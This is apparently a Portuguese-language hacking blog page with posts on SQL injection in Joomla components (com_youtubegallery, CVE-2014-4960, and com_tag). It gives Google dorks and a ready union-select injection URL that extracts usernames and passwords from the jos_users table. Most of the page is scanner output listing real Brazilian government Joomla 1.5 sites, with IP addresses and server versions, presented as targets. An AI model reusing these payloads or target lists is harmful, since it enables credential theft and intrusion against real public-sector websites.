Exploit Título: com_youtubegallery componente Joomla - vulnerabilidade de injeção SQL 
DORK[0]: inurl:index.php?option=com_youtubegallery 
Vendedor Homepage: http://www.joomlaboat.com/youtube-gallery 
Software Link: http://www.joomlaboat.com/youtube-gallery 
Versão: 4.x (3.x talvez) 
Testado em: nova versão 4.1.7 em Joomla 1.5, 2.5, 3 
CVE: CVE-2014-4960 

EXEMPLO=>
http://TARGET/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1{SQL-INJECTION}&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700

quinta-feira, 3 de julho de 2014

joomla component com_tag (tag_id) SQL Injection Vulnerability

[Joomla componente]
[X] com_tag (tag_id) Vulnerável a SQL-injection


0xDORK[0]: inurl:option=com_tag
0xExploit[0]: /index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component 


Exemplo: 


http://WWW.URL.COM/index.php?option=com_tag&controller=tag&task=add&article_id=1

/index.php?option=com_tag&controller=tag&task=add&article_id=-ID{vull}

Injetando:

http://
WWW.URL.COM/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component

RESPOSTA:

[X] com_tag (tag_id) Vulnerável a SQL-injection



REF:http://www.exploit-id.com/web-applications/joomla-component-com_tag-tag_id-sql-injection-vulnerability

ALGUNS RESULTADOS:
Usando scanner INURLBR:
Usando scanner INURLBR:
REPOSITÓRIO::: http://pastebin.com/Tb0Qp0qY

quinta-feira, 17 de outubro de 2013

Joomscan

Joomscan permite Testar o seu site sobre os tipos de ataques XSS, SQL Injection, LFI, RFI, bruteforce

Joomscan permite Testar o seu site sobre os tipos de ataques XSS, SQL Injection, LFI, RFI, bruteforce etc.
Joomla é um sistema de gerenciamento de conteúdo open source (CMS). É uma estrutura muito poderosa para a construção de web sites e é um dos mais populares sistemas mais poderosos e para gerenciamento de conteúdo em todo o mundo.

http://web-center.si/projekt-joomscan/155-orodje-za-testiranje-joomle-joomscan

domingo, 15 de setembro de 2013

Buscando sites joomla "1.5" no domínio gov.br

DORK: site:.gov.br "ADMINISTRADOR" joomla "1.5" ext:php

[5] - www.sudmennucci.sp.gov.br/index.php?option...id...
/ HTTP_CODE: 200 / IP SERVER: 186.202.153.163 / PORTA SERVER: 80 / WEB SERVER:

[6] - http://www.sudmennucci.sp.gov.br/index.php?option=com_content&view=section&layout=blog&id=3&Itemid=44&limitstart=20
/ HTTP_CODE: 500 / IP SERVER: 186.202.153.163 / PORTA SERVER: 80 / WEB SERVER: Apache

[7] - www.sudmennucci.sp.gov.br/index.php?option...
/ HTTP_CODE: 200 / IP SERVER: 186.202.153.163 / PORTA SERVER: 80 / WEB SERVER:

[8] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2308%3Arelatorio-da-smdr-de-ss02-ate-06-de-setembro-de-2013&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[9] - www.cangucu.rs.gov.br/index.php?option=com...id...
/ HTTP_CODE: 404 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:
[10] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2179%3Arelatorio-semanal-de-atividades-desempenhadas-pela-secretaria-de-desenvolvimento-rural&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[11] - www.cangucu.rs.gov.br/index.php?option...
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[12] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2291%3Arelatorio-de-atividades-desempenhadas-pela-secretaria-de-desenvolvimento-rural-de-19-a-30-de-agosto&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[13] - www.cangucu.rs.gov.br/index.php?...a...
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[14] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2203%3Aroteiro-de-servicos-da-smdr&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)
[15] - www.cangucu.rs.gov.br/index.php?option...id...
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[16] - http://www.procon.rioverde.go.gov.br/index.php?option=com_content&view=category&id=42&Itemid=234&format=feed&type=rss
/ HTTP_CODE: 200 / IP SERVER: 200.230.61.133 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2
[17] - www.procon.rioverde.go.gov.br/index.php?...id...
/ HTTP_CODE: 200 / IP SERVER: 200.230.61.133 / PORTA SERVER: 80 / WEB SERVER:

[18] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2102%3Arelatorio-semanal-de-atividades-desempenhadas-pela-secretaria-de-desenvolvimento-rural&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[19] - http://www.camaralp.mg.gov.br/index.php?option=com_content&task=view&id=6&Itemid=66
/ HTTP_CODE: 500 / IP SERVER: 208.43.27.18 / PORTA SERVER: 80 / WEB SERVER: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

[20] - www.camaralp.mg.gov.br/index.php?option=com...id...
/ HTTP_CODE: 404 / IP SERVER: 208.43.27.18 / PORTA SERVER: 80 / WEB SERVER:

[21] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=4912%3Apromotoria-da-saude-de-cg-firma-tac-com-hospitais-para-a-oferta-de-de-dialise&catid=43%3Asaude
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)

[22] - www.mp.pb.gov.br/index.php?option...id...
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER:

[23] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=frontpage
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[24] - www.cangucu.rs.gov.br/index.php?option=com_content...
/ HTTP_CODE: 404 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[25] - http://www.areial.pb.gov.br/index.php?option=com_content&view=article&id=246%3Aparoquias-de-esperanca-e-areial-promovem-a-xiv-caminhada-penitencial&catid=38%3Anoticias&Itemid=130

[26] - www.areial.pb.gov.br/index.php?option...e...

[27] - http://www.camaralp.mg.gov.br/index.php?option=com_content&task=section&id=9&Itemid=47
/ HTTP_CODE: 500 / IP SERVER: 208.43.27.18 / PORTA SERVER: 80 / WEB SERVER: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

[28] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=1964%3Arelatorio-semanal-da-smdr&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[29] - www.cangucu.rs.gov.br/index.php?option=com...
/ HTTP_CODE: 404 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[30] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=4076%3Aresolucao-regulamenta-atribuicoes-dos-cargos-criados-na-area-de-ti-criados-pela-lei-971512&catid=34%3Agerais
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)

[31] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=3678%3Amp-constitui-comissao-para-concurso-na-area-de-tecnologia-da-informacao&catid=34%3Agerais
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)

[32] - www.mp.pb.gov.br/index.php?option=com...
/ HTTP_CODE: 404 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER:

[33] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=3702%3Amppb-devera-lancar-edital-de-concurso-na-area-de-ti-ainda-em-junho&catid=34%3Agerais
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)

[34] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2207%3Asecretario-acompanha-trabalho-de-equipes-do-interior&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[35] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2153%3Aprefeito-participa-de-audiencia-publica-na-camara&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[36] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=1640%3Arelatorio-semanal-de-atividades-da-secretaria-de-desenvolvimento-rural&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[37] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=1704%3Arelatorio-semanal-de-atividades-desempenhadas-pela-secretaria-de-desenvolvimento-rural&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)
[38] - http://ead.florestadigital.ac.gov.br/mod/glossary/view.php?id=104&mode=letter&hook=ALL&sortkey&sortorder=asc&fullsearch=0&page=-1
/ HTTP_CODE: 303 / IP SERVER: 187.6.85.56 / PORTA SERVER: 80 / WEB SERVER: Array

[39] - http://ead.florestadigital.ac.gov.br/mod/glossary/print.php?id=104&mode=cat&hook=-1&sortkey&sortorder=asc&offset=-10
/ HTTP_CODE: 303 / IP SERVER: 187.6.85.56 / PORTA SERVER: 80 / WEB SERVER: Array

[40] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2139%3Aprefeito-recebe-reportagem-da-radio-cultura-am&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[41] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=366%3Ainaugurada-em-cangucu-fase-inicial-da-energia-eolica&catid=61%3Amural&Itemid=256
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[42] - http://www.procon.rioverde.go.gov.br/index.php?option=com_content&view=category&id=42&Itemid=234&format=feed&type=atom
/ HTTP_CODE: 200 / IP SERVER: 200.230.61.133 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2

[43] - http://www.procon.rioverde.go.gov.br/index.php
/ HTTP_CODE: 200 / IP SERVER: 200.230.61.133 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2

[44] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=1069%3Aseminario-mostra-como-transformar-o-lixo-em-fonte-de-renda&catid=46%3Ameioambiente&Itemid=122
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)